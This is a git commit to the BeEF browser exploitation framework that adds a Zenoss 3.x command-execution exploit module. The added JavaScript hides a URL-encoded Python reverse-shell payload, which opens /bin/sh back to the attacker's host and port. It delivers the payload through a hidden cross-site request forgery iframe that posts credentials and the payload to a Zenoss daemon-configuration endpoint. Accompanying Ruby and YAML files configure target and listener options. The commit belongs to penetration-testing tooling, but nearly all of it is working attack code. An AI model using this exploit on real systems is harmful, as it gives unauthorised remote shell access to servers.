Add Zenoss 3.x command execution exploit

2012-11-11 21:40:50 +10:30
parent bcb0e55802
commit 05e31fd250
4 changed files with 82 additions and 1 deletions
--- a/modules/exploits/wanem_command_execution/module.rb
+++ b/modules/exploits/wanem_command_execution/module.rb
@@ -4,7 +4,7 @@
 # See the file 'doc/COPYING' for copying permission
 #
 ################################################################################
-# For more information see: http://support.freenas.org/ticket/1788
+# For more information see:  http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/
 ################################################################################
 class Wanem_command_execution < BeEF::Core::Command

--- a/modules/exploits/zenoss_3x_command_execution/command.js
+++ b/modules/exploits/zenoss_3x_command_execution/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+  var rhost = '<%= @rhost %>'; 
+  var rport = '<%= @rport %>';
+  var lhost = '<%= @lhost %>';
+  var lport = '<%= @lport %>';
+  var user  = '<%= @user  %>';
+  var pass  = '<%= @pass  %>';
+  var target  = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig'
+
+  // reverse python payload
+  var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22')
+
+  // send request
+  var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [
+    {'type':'hidden', 'name':'__ac_name',     'value':user},
+    {'type':'hidden', 'name':'__ac_password', 'value':pass},
+    {'type':'hidden', 'name':'daemon',        'value':payload}
+  ]);
+  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+  // clean up
+  cleanup = function() {
+    document.body.removeChild(zenoss_iframe_<%= @command_id %>);
+  }
+  setTimeout("cleanup()", 15000);
+
+});
+
--- a/modules/exploits/zenoss_3x_command_execution/config.yaml
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+beef:
+    module:
+        zenoss_command_execution:
+            enable: true
+            category: "Exploits"
+            name: "Zenoss 3.x Command Execution"
+            description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]
--- a/modules/exploits/zenoss_3x_command_execution/module.rb
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+class Zenoss_command_execution < BeEF::Core::Command
+
+	def self.options
+		configuration = BeEF::Core::Configuration.instance
+		lhost = "#{configuration.get("beef.http.host")}"
+		lhost = "" if lhost == "0.0.0.0"
+		return [
+			{ 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+			{ 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
+			{ 'name' => 'lhost', 'ui_label' => 'Local Host',  'value' => lhost},
+			{ 'name' => 'lport', 'ui_label' => 'Local Port',  'value' => '4444'},
+			{ 'name' => 'user',  'ui_label' => 'Username',    'value' => 'admin'},
+			{ 'name' => 'pass',  'ui_label' => 'Password',    'value' => 'zenoss'},
+		]
+	end
+
+	def post_execute
+		save({'result' => @datastore['result']})
+	end
+
+end